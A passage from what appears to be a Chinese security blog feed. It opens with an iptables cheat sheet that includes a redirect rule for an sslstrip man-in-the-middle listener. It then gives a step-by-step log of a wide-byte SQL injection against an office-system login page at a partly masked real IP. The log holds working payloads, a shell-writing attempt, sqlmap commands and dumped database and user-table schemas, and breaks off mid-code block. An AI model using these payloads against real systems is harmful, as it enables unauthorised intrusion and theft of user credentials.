<content type="html"><![CDATA[<p>Chain</p><ol><li>PREROUTING (路由前)</li><li>INPUT (数据包流入口)</li><li>FORWARD (转发)</li><li>OUTPUT (数据包出口)</li><li>POSTROUTING (路由后)</li></ol><p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p><a id="more"></a><p>查看路由表<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -L -n -v</div><div class="line">iptables -L -n --line-number</div><div class="line">iptables -t nat -vnL</div></pre></td></tr></table></figure></p><p>设置默认策略<br>iptables -P INPUT (DROP|ACCEPT) 默认是关的/默认是开的</p><p>清空规则链<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -t nat -F 清空nat表的所有链</div><div class="line">iptables -t nat -F PREROUTING</div><div class="line">iptables -F</div></pre></td></tr></table></figure></p><p>新建一个链<br>iptables -N NEWCHAINNAME</p><p>-s:指定作为源地址匹配,这里不能指定主机名称,必须是IP<br>IP | IP/MASK | 0.0.0.0/0.0.0.0<br>而且地址可以取反,加一个“!”表示除了哪个IP之外<br>-d:表示匹配目标地址<br>-p:用于匹配协议的(这里的协议通常有3种,TCP/UDP/ICMP)<br>-i eth0:从这块网卡流入的数据<br>流入一般用在INPUT和PREROUTING上<br>-o eth0:从这块网卡流出的数据<br>流出一般在OUTPUT和POSTROUTING上</p><p>–dport 22 指定目的端口<br>–sport 22 指定源端口<br>-p tcp 指定协议<br>-j ACTION DROP/REJECT/ACCEPT/DNAT(目的地址转换)/SNAT(源地址转换)/MASQUERADE/REDIRECT</p><p>只允许192.168.6.1访问本机ssh服务<br><code>iptables -t filter -A INPUT -s 192.168.6.1 -p tcp --dport 22 -j ACCEPT</code></p><p>除了192.168.6.1地址拒绝所有其他访问22端口<br><code>iptables -A INPUT ! -s 192.168.6.1 -p tcp --dport 22 -j DROP</code></p><p>删除第4条(delete)<br><code>iptables -D INPUT 4</code></p><p>删除FORWARD<br><code>iptables -D FORWARD 1</code></p><p>比如进来的只允许状态为NEW和ESTABLISHED的进来,出去只允许ESTABLISHED的状态出去,这就可以将比较常见的反弹式木马有很好的控制机制。</p><p>nat功能<br><code>iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE</code></p><p>nat之后,将访问192.168.10.18 80端口定向到nat后的172.16.100.2<br><code>iptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2</code></p><p>将访问80端口转发到本地端口<br><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <sslstrip listenPort></code></p><p>DNAT 端口映射<br><code>iptables -t nat -A PREROUTING -d 公网IP -p TCP --dport 80 -j DNAT --to-destination 10.31.2.1</code><br><code>iptables -t nat -A PREROUTING -i eth1 -p udp --dport 53 -j DNAT --to 192.168.6.1</code></p><p>删除nat PREROUTING<br><code>iptables -t nat -D PREROUTING <num></code></p><p>在INPUT第三条后面插入(insert)<br><code>iptables -I INPUT 3 -p tcp --dport 21 -j ACCEPT</code></p><p>修改<br><code>iptables -R INPUT 3 -j DROP</code></p><p>默认规则<br><code>iptables -A INPUT -j ACCEPT</code></p><p>保存<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables-save</div><div class="line">/etc/sysconfig/iptables</div></pre></td></tr></table></figure></p><p>恢复<br><code>iptables-restore</code></p><p>每30s 5个连接(rcheck是接收到第1个数据包时开始计时,10s内仅限3次连接,后续的包丢弃)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables -R INPUT 2 -p icmp -m recent --update --seconds 10 --hitcount 3 --name PINGTEST --rsource -j DROP</div><div class="line"> -A INPUT -p icmp -m recent --set --name PINGTEST --rsource -j ACCEPT</div></pre></td></tr></table></figure></p><p>控制单个IP的最大并发连接数 < 10<br><code>iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j REJECT</code></p><p>控制单个IP在一定的时间内允许新建立的连接数 15/m<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT</div><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -j DROP</div></pre></td></tr></table></figure></p><p>过滤ip<br><code>iptables -I INPUT -s 121.69.131.144 -j DROP</code></p><p>CentOS<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">/sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT #开启8080端口</div><div class="line">/etc/rc.d/init.d/iptables save #保存配置</div><div class="line">/etc/rc.d/init.d/iptables restart #重启服务</div><div class="line">/etc/init.d/iptables status</div></pre></td></tr></table></figure></p>]]></content>
<summary type="html">
<p>Chain</p>
<ol>
<li>PREROUTING (路由前)</li>
<li>INPUT (数据包流入口)</li>
<li>FORWARD (转发)</li>
<li>OUTPUT (数据包出口)</li>
<li>POSTROUTING (路由后)</li>
</ol>
<p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p>
</summary>
</entry>
<entry>
<title>PHP宽字节报错注入</title>
<link href="http://ruos.org/2015/07/04/PHP%E5%AE%BD%E5%AD%97%E8%8A%82%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"/>
<id>http://ruos.org/2015/07/04/PHP宽字节报错注入/</id>
<published>2015-07-04T05:16:45.000Z</published>
<updated>2017-11-17T03:59:06.544Z</updated>
<content type="html"><![CDATA[<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="注入测试"></a>注入测试</h4><p>注入点,单引号被转义<br>POST <a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a><br>PASSWORD=1111&UNAME=admin</p><h5 id="TESTING01-测试宽字节"><a href="#TESTING01-测试宽字节" class="headerlink" title="TESTING01 测试宽字节"></a>TESTING01 测试宽字节</h5><p><code>PASSWORD=1111&UNAME=1%bf'</code></p><p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1縗’’’ at line 1<br>SQL语句: <code>SELECT * from USER where USER_ID='1縗'' or BYNAME='1縗''</code><br>文件: D:/myoa/webroot/logincheck.php</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">Note</div><div class="line">为了阻止SQL注入,php引入了magic_quotes_gpc,当打开时会对单引号,双引号,反斜线和 NULL字符自动转义。但是当数据库是GBK编码,就会导致宽字节注入。</div><div class="line">转义引号\'</div><div class="line">PASSWORD=123456&UNAME=admin%bf\'</div><div class="line"> ---------------------</div><div class="line">|\ ==> %5C |</div><div class="line">|当 %bf5c会解码成 縗 |</div><div class="line"> ---------------------</div></pre></td></tr></table></figure><h5 id="TESTING02-闭合语句"><a href="#TESTING02-闭合语句" class="headerlink" title="TESTING02 闭合语句"></a>TESTING02 闭合语句</h5><p><code>PASSWORD=123456&UNAME=admin%bf%5C'</code></p><p>SQL语句: <code>SELECT * from USER where USER_ID='admin縗'' or BYNAME='admin縗''</code></p><p>但是系统多加了一个引号’导致语句出错,我们使用#(%23)注释掉后面的语句。</p><p><code>PASSWORD=123456&UNAME=admin%bf'%23</code></p><p>SQL语句: <code>SELECT * from USER where USER_ID='admin縗'#' or BYNAME='admin縗'#'</code></p><h5 id="TESTING03-处理插入语句报错"><a href="#TESTING03-处理插入语句报错" class="headerlink" title="TESTING03 处理插入语句报错"></a>TESTING03 处理插入语句报错</h5><p>select登陆查询语句成功执行,未报错,但是登陆日志插入语句报语法错误。</p><p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ at line 1<br>SQL语句: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗'#','2015-09-04 13:41:11','27.211.123.74','10','USERNAME=admin縗'#')</code><br>文件: D:/myoa/webroot/logincheck.php</p><p>使用注释构造插入语句<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4)%23</code></p><p>#1136: Column count doesn’t match value count at row 1<br>SQL语句: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗',2,3,4)#','2015-09-04 13:50:55','27.211.123.74','10','USERNAME=admin縗',2,3,4)#')</code><br>文件: D:/myoa/webroot/logincheck.php</p><p>提示列数不对,插入少了一个字段,添加一个值后无报错。</p><p>PAYLOAD<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4,5)%23</code></p><h4 id="尝试写SHELL"><a href="#尝试写SHELL" class="headerlink" title="尝试写SHELL"></a>尝试写SHELL</h4><p>判断列数<br><code>PASSWORD=123456&UNAME=admin%bf' order by 1%23</code></p><p>使用列最大值判断是否出错<br><code>PASSWORD=123456&UNAME=admin%bf' order by 100%23</code></p><p>#1054: Unknown column ‘100’ in ‘order clause’<br>SQL语句: <code>SELECT * from USER where USER_ID='admin縗' order by 100#' or BYNAME='admin縗' order by 100#'</code><br>文件: D:/myoa/webroot/logincheck.php</p><p>不报错字段77,卧槽77啊<br><code>PASSWORD=123456&UNAME=admin%bf' order by 77%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 123456,admin縗%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,...,74,75,76,77 into outfile "D:/myoa/webroot/r1.txt"%23</code><br>返回空白(可能没有写入权限或者目录不可写)</p><h4 id="sqlmap添加-自动跑库"><a href="#sqlmap添加-自动跑库" class="headerlink" title="sqlmap添加*自动跑库"></a>sqlmap添加*自动跑库</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div></pre></td><td class="code"><pre><div class="line">python sqlmap.py -u <span class="string">"http://211.137.*.*/logincheck.php"</span> --data=<span class="string">"PASSWORD=123456&UNAME=admin%bf'*%23"</span> --tables</div><div class="line"></div><div class="line">web server operating system: Windows</div><div class="line">web application technology: PHP 5.2.10, Apache 2.2.22</div><div class="line">back-end DBMS: MySQL 5.0</div><div class="line">Database: TRAIN</div><div class="line">[5 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| kind |</div><div class="line">| pass |</div><div class="line">| price |</div><div class="line">| station |</div><div class="line">| train |</div><div class="line">+---------------------------------------+</div><div class="line"></div><div class="line">Database: TD_OA</div><div class="line">[204 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| user |</div><div class="line"></div><div class="line">Table: user //登陆用户数据</div><div class="line">[77 columns]</div><div class="line">+------------------+------------------+</div><div class="line">| Column | Type |</div><div class="line">+------------------+------------------+</div><div class="line">| ADD_HOME | varchar(200) |</div><div class="line">| AUTHORIZE | int(11) |</div><div class="line">| AVATAR | varchar(20) |</div><div class="line">| BBS_COUNTER | int(11) |</div><div class="line">| BBS_SIGNATURE | text |</div><div class="line">| BIND_IP | text |</div><div class="line">| BIRTHDAY | date |</div><div class="line">| BKGROUND | text |</div><div class="line">| BP_NO | varchar(50) |</div><div class="line">| BYNAME | varchar(20) |</div><div class="line">| CALL_SOUND | char(2) |</div><div class="line">| CANBROADCAST | int(11) |</div><div class="line">| CONCERN_USER | text |</div><div class="line">| DEPT_ID | int(11) |</div><div class="line">| DEPT_ID_OTHER | text |</div><div class="line">| DISABLED | int(11) |</div><div class="line">| DUTY_TYPE | int(11) |</div><div class="line">| EMAIL | varchar(50) |</div><div class="line">| EMAIL_CAPACITY | int(11) |</div><div class="line">| FAX_NO_DEPT | varchar(50) |</div><div class="line">| FOLDER_CAPACITY | int(11) |</div><div class="line">| ICQ_NO | varchar(50) |</div><div class="line">| IS_LUNAR | char(1) |</div><div class="line">| KEY_SN | varchar(100) |</div><div class="line">| LAST_PASS_TIME | datetime |</div><div class="line">| LAST_VISIT_IP | varchar(100) |</div><div class="line">| LAST_VISIT_TIME | datetime |</div><div class="line">| LIMIT_LOGIN | char(1) |</div><div class="line">| MENU_EXPAND | char(2) |</div><div class="line">| MENU_IMAGE | varchar(20) |</div><div class="line">| MENU_TYPE | char(1) |</div><div class="line">| MOBIL_NO | varchar(50) |</div><div class="line">| MOBIL_NO_HIDDEN | char(1) |</div><div class="line">| MOBILE_PS1 | varchar(50) |</div><div class="line">| MOBILE_PS2 | varchar(50) |</div><div class="line">| MOBILE_SP | varchar(50) |</div><div class="line">| MSN | varchar(200) |</div><div class="line">| MY_RSS | text |</div><div class="line">| MY_STATUS | varchar(200) |</div><div class="line">| MYTABLE_LEFT | varchar(200) |</div><div class="line">| MYTABLE_RIGHT | varchar(200) |</div><div class="line">| NICK_NAME | varchar(50) |</div><div class="line">| NOT_LOGIN | varchar(20) |</div><div class="line">| NOT_VIEW_TABLE | varchar(20) |</div><div class="line">| NOT_VIEW_USER | varchar(20) |</div><div class="line">| OICQ_NO | varchar(50) |</div><div class="line">| ON_STATUS | char(1) |</div><div class="line">| ONLINE | int(11) |</div><div class="line">| PANEL | char(1) |</div><div class="line">| PASSWORD | varchar(50) |</div><div class="line">| PIC_ID | int(10) unsigned |</div><div class="line">| POST_DEPT | text |</div><div class="line">| POST_NO_HOME | varchar(50) |</div><div class="line">| POST_PRIV | varchar(50) |</div><div class="line">| REMARK | text |</div><div class="line">| SCORE | int(11) |</div><div class="line">| SECURE_KEY_SN | varchar(20) |</div><div class="line">| SEX | char(1) |</div><div class="line">| SHORTCUT | text |</div><div class="line">| SHOW_RSS | char(1) |</div><div class="line">| SMS_ON | char(1) |</div><div class="line">| TDER_FLAG | char(1) |</div><div class="line">| TEL_NO_DEPT | varchar(50) |</div><div class="line">| TEL_NO_HOME | varchar(50) |</div><div class="line">| THEME | varchar(10) |</div><div class="line">| UID | int(11) |</div><div class="line">| UIN | int(10) unsigned |</div><div class="line">| USEING_KEY | char(2) |</div><div class="line">| USER_DEFINE | text |</div><div class="line">| USER_ID | varchar(20) |</div><div class="line">| USER_NAME | varchar(200) |</div><div class="line">| USER_NO | int(11) |</div><div class="line">| USER_PRIV | varchar(10) |</div><div class="line">| USER_PRIV_OTHER | text |</div><div class="line">| WEATHER_CITY | varchar(20) |</div><div class="line">| WEBMAIL_CAPACITY | int(11) |</div><div class="line">| WEBMAIL_NUM | int(11) |</div><div class="line">+------------------+------------------+</div><div class="line"></div><div class="line"></div><div class="line">| version |</div><div class="line">| address |</div><div class="line">| address_group |</div><div class="line">| affair |</div><div class="line">| app_config |</div><div class="line">| app_log |</div><div class="line">| attachment_edit |</div><div class="line">| attend_config |</div><div class="line">| attend_duty |</div><div class="line">| attend_evection |</div><div class="line">| attend_holiday |</div><div class="line">| attend_leave |</div><div class="line">| attend_manager |</div><div class="line">| attend_out |</div><div class="line">| bbs_board |</div><div class="line">| bbs_comment |</div><div class="line">| book_info |</div><div class="line">| book_manage |</div><div class="line">| book_manager |</div><div class="line">| book_type |</div><div class="line">| bs_line |</div><div class="line">| calendar |</div><div class="line">| categories_type |</div><div class="line">| censor_data |</div><div class="line">| censor_module |</div><div class="line">| censor_words |</div><div class="line">| chatroom |</div><div class="line">| contact |</div><div class="line">| contract |</div><div class="line">| contract_line |</div><div class="line">| countdown |</div><div class="line">| cp_asset_type |</div><div class="line">| cp_assetcfg |</div><div class="line">| cp_cptl_info |</div><div class="line">| cp_dpct_sub |</div><div class="line">| cp_prcs_prop |</div><div class="line">| customer |</div><div class="line">| department |</div><div class="line">| dept_map |</div><div class="line">| diary |</div><div class="line">| diary_comment |</div><div class="line">| diary_comment_reply |</div><div class="line">| efax_account |</div><div class="line">| efax_receive_box |</div><div class="line">| efax_send_box |</div><div class="line">| email |</div><div class="line">| email_body |</div><div class="line">| email_box |</div><div class="line">| exam_data |</div><div class="line">| exam_flow |</div><div class="line">| exam_paper |</div><div class="line">| exam_quiz |</div><div class="line">| exam_quiz_set |</div><div class="line">| ext_user |</div><div class="line">| field_date |</div><div class="line">| fieldsetting |</div><div class="line">| file_content | //?</div><div class="line">| file_sort |</div><div class="line">| flow_form_type |</div><div class="line">| flow_print_tpl |</div><div class="line">| flow_process |</div><div class="line">| flow_query_tpl |</div><div class="line">| flow_rule |</div><div class="line">| flow_run |</div><div class="line">| flow_run_data |</div><div class="line">| flow_run_feedback |</div><div class="line">| flow_run_log |</div><div class="line">| flow_run_prcs |</div><div class="line">| flow_sort |</div><div class="line">| flow_timer |</div><div class="line">| flow_type |</div><div class="line">| hrms |</div><div class="line">| icqcontact_tb |</div><div class="line">| icqmsgs_tb |</div><div class="line">| icqservermsg_tb |</div><div class="line">| interface |</div><div class="line">| ip_rule |</div><div class="line">| linkman |</div><div class="line">| meeting |</div><div class="line">| meeting_equipment |</div><div class="line">| meeting_room |</div><div class="line">| module_priv |</div><div class="line">| mytable |</div><div class="line">| netchat |</div><div class="line">| netdisk |</div><div class="line">| netmeeting |</div><div class="line">| news |</div><div class="line">| news_comment |</div><div class="line">| notes |</div><div class="line">| notify |</div><div class="line">| oa_faxassign |</div><div class="line">| oa_faxbatch |</div><div class="line">| oa_faxconfig |</div><div class="line">| oa_faxfeecharge |</div><div class="line">| oa_faxfeeline |</div><div class="line">| oa_faxfeeprice |</div><div class="line">| oa_faxlog |</div><div class="line">| oa_faxremotehost |</div><div class="line">| oa_faxs |</div><div class="line">| oa_faxserverconfig |</div><div class="line">| oa_faxspecline |</div><div class="line">| oa_faxtemplates |</div><div class="line">| oa_options |</div><div class="line">| oa_source |</div><div class="line">| oa_source_used |</div><div class="line">| oa_stamps |</div><div class="line">| oc_log |</div><div class="line">| office_products |</div><div class="line">| office_task |</div><div class="line">| office_transhistory |</div><div class="line">| order_line |</div><div class="line">| picture |</div><div class="line">| plan_type |</div><div class="line">| product |</div><div class="line">| proj_bug |</div><div class="line">| proj_comment |</div><div class="line">| proj_cost |</div><div class="line">| proj_file |</div><div class="line">| proj_file_log |</div><div class="line">| proj_file_sort |</div><div class="line">| proj_forum |</div><div class="line">| proj_priv |</div><div class="line">| proj_project |</div><div class="line">| proj_task |</div><div class="line">| proj_task_log |</div><div class="line">| provider |</div><div class="line">| provider_linkman |</div><div class="line">| rms_file |</div><div class="line">| rms_lend |</div><div class="line">| rms_roll |</div><div class="line">| rms_roll_room |</div><div class="line">| rsa_keypair |</div><div class="line">| sal_data |</div><div class="line">| sal_flow |</div><div class="line">| sal_item |</div><div class="line">| sale_history |</div><div class="line">| sale_manager |</div><div class="line">| score_date |</div><div class="line">| score_flow |</div><div class="line">| score_group |</div><div class="line">| score_item |</div><div class="line">| seal |</div><div class="line">| seal_keylic |</div><div class="line">| seal_log |</div><div class="line">| secure_key |</div><div class="line">| service |</div><div class="line">| sms |</div><div class="line">| sms2 |</div><div class="line">| sms2_priv |</div><div class="line">| sms3 |</div><div class="line">| sms_body |</div><div class="line">| supply_history |</div><div class="line">| supply_order |</div><div class="line">| sys_code |</div><div class="line">| sys_function |</div><div class="line">| sys_log |</div><div class="line">| sys_menu |</div><div class="line">| sys_para |</div><div class="line">| task |</div><div class="line">| train_apply |</div><div class="line">| train_appoint_muster |</div><div class="line">| train_assess_data |</div><div class="line">| train_assess_item |</div><div class="line">| train_assess_title |</div><div class="line">| train_courses |</div><div class="line">| train_ctype |</div><div class="line">| train_info |</div><div class="line">| train_mail |</div><div class="line">| train_manager |</div><div class="line">| train_newcourse |</div><div class="line">| train_survey_data |</div><div class="line">| train_survey_item |</div><div class="line">| train_survey_title |</div><div class="line">| train_teachers |</div><div class="line">| train_ttype |</div><div class="line">| uni1 |</div><div class="line">| unit |</div><div class="line">| url |</div><div class="line">| user_group |</div><div class="line">| user_map |</div><div class="line">| user_online |</div><div class="line">| user_priv |</div><div class="line">| vehicle |</div><div class="line">| vehicle_maintenance |</div><div class="line">| vehicle_operator |</div><div class="line">| vehicle_usage |</div><div class="line">| versio1 |</div><div class="line">| vi_flow_run |</div><div class="line">| vi_user |</div><div class="line">| vote_data |</div><div class="line">| vote_item |</div><div class="line">| vote_title |</div><div class="line">| webmail |</div><div class="line">| wiki_ask |</div><div class="line">| wiki_ask_answer |</div><div class="line">| wiki_comment |</div><div class="line">| wiki_info |</div><div class="line">| winexe |</div><div class="line">| word_model |</div><div class="line">| work_detail |</div><div class="line">| work_person |</div><div class="line">| work_plan |</div><div class="line">| zl_file |</div><div class="line">+---------------------------------------+</div></pre></td></tr></table></figure><p>python sqlmap.py -u “<a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a>“ –data=”PASSWORD=123456&UNAME=admin%bf’*%23” -D TRAIN -T pass –columns</p><p>判断列字段个数<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(</div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(qqqpq,<span class="comment">/*concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULL*/</span></div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="string">'pass'</span> <span class="keyword">AND</span> table_schema=<span class="string">'TRAIN'</span>), <span class="comment">/*,获取列个数,如果没有就返回空NULL*/</span></div><div class="line">qzvpq,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="comment">/*floor:函数只返回整数部分,小数部分舍弃*/</span></div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x) <span class="keyword">as</span> a<span class="comment">/*这句话的意思是说每个派生出来的表(a)都必须有一个自己的别名*/</span>)#</div><div class="line"><span class="comment">/*</span></div><div class="line"><span class="comment">MySQL 的CAST()和CONVERT()函数可用来获取一个类型的值,并产生另一个类型的值。两者具体的语法如下:</span></div><div class="line"><span class="comment">CAST(value as type);</span></div><div class="line"><span class="comment">CONVERT(value, type);</span></div><div class="line"><span class="comment">就是CAST(xxx AS 类型), CONVERT(xxx,类型)。</span></div><div class="line"><span class="comment">*/</span></div></pre></td></tr></table></figure><p>爆列名<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div 